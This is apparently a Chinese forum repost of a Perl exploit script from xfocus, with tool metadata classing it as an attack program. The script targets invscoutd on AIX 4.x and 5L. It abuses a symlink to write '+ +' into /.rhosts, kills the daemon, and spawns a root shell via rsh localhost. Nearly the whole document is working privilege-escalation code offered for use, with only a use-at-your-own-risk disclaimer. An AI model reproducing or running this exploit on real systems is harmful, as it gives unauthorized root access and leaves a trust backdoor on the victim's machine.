猪猪 2007-2-27 13:50
x_invscoutd_aix5l_4x.pl
提交时间:2004-03-24
提交用户:watercloud
工具分类:攻击程序
运行平台:Unix
工具大小:1035 Bytes
文件MD5 :684a30bff440f398eda31f03d373c1d2
工具来源:[url]www.xfocus.net[/url]
#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author : [email]watercloud@xfocus.org[/email]
# Site : [url]www.xfocus.org[/url] [url]www.xfocus.net[/url]
# Date : 2003-5-29
# Announce: use as your owner risk!
$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;
print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;
symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";
system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";
sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF